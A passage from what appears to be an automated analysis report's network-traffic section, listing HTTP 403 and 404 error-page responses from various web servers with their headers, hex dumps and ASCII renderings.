30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:41 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 806e76457ee64399-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:41 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:42 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:43 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:43 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:43 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IH4S3mFKEjEcSAVX73mNN7eOQRRisN%2Bjks1tdrs0SWagP%2BKDJRIksc4cdYuIhxuXDVIxSCK1LoD3LICfV3aYlOW12Q2HOj3QOf4xHfEMA03t9sl4OtFAAfhiuXS23zo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7652afae1a3c-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:44 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1694755665.0447642826002919314X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 15 Sep 2023 05:27:45 GMTX-Served-By: cache-iad-kiad7000058-IADX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjBdxec7r7DHGEpZo2ij+24cm7On4dir39PTYYK13tG9Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:27:45 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 